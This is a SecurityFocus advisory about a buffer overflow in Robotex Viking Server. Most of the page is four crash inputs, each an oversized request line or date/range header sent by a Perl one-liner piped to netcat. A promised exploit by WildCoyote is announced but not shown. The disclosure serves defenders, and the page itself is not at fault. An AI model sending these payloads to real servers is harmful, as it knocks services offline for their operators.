Robotex Viking Server Buffer Overflow Vulnerability

The following commands will crash Viking Server:

1)
GET [x11765] HTTP/1.1<enter><enter>
(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)

2)
GET / HTTP/1.1<enter>
Unless-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)

3)
GET / HTTP/1.1<enter>
If-Range: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc 127.1 80)

4)
GET / HTTP/1.1<enter>
If-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)

WildCoyote <wildcoyote@coders-pt.org> has released the following exploit:


 

Privacy Statement
Copyright 2010, SecurityFocus